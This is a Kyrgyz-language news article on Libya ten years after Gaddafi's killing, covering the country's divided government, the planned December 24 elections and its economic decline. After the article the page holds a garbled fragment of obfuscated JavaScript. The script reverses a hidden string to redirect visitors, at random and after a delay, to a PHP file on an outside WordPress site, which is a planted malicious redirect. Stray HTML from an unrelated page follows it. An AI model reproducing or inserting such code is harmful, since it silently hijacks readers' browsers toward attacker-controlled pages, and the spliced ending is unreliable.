Муаммар Каддафинин өлтүрүлгөнүнө 10 жыл болду. Ливиянын учурдагы абалы кандай?
Ливиянын лидери Муаммар Каддафинин кыйноо жолу менен өлтүрүлгөнүнө быйыл туура 10 жыл болду. Каддафи өлтүрүлөрү менен Ливия бүтүндүгүн жоготуп, каршылаш турган күчтөр өлкөнү чыгыш менен батышка бөлүп, кош бийлик орун алган.
2021-жылдын алгачкы айларында гана тараптар БУУнун эгидасынын алдында ок атууну токтотуп, жалпы шайлоону 24-декабрда өткөрүү боюнча макулашууга кол коюшкан.
Бул боюнча Триполинин элинин пикирлери кандай?
«Каддафинин өлүмүнөн кийин өлкө бир нече этапты басып өттү. Алгач турмушубуз жакшы болду. Бирок барган сайын абал началап бара жатат».
«Акыркы он жыл бою тирешүүлөрдөн келип чыккан кризистен арылбай келебиз. Жашоо оорлоп кетти».
Акыркы 10 жылда өлкөдө ички дүң продуктунун (ИДП) көлөмү эки эсеге төмөндөгөн. Кош бийликтин айынан инфраструктура толугу менен талкаланып, Ливия Европага кирүүнү көздөгөн африкалык качкындардын өтмөк пунктуна айланган.
«24-декабрга белгиленген шайлоо тынч өтүп кетсе, мамлекетибизде көптөн күткөн стабилдүүлүк жана коопсуздук орноп, укуктук мамлекетке тынчтык жолу менен өтөбүз деген ишеничтебиз», — дейт саясий серепчи Ахмед аль-Рашраш.
Каддафинин режиминин кулашына БУУнун Коопсуздук Кеңеши тарабынан уруксат берилген чет өлкөлүк аскердик күчтөрдүн кийлегишүүсү себеп болгон.
24-декабрга белгилеген шайлоодо Муаммар Каддафинин уулу Саиф аль-Ислам президентикке талапкерлигин коет деген бейрасмий маалыматтар айтылууда.





{if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>topcor.ru/uploads/posts/2020-01/1578386145_6a00d8341bfb1653ef014e5fbf09f1970c.jpg» alt=»Турция оценила возможность столкновения с Россией в Ливии» /></figure>
<figure class=)
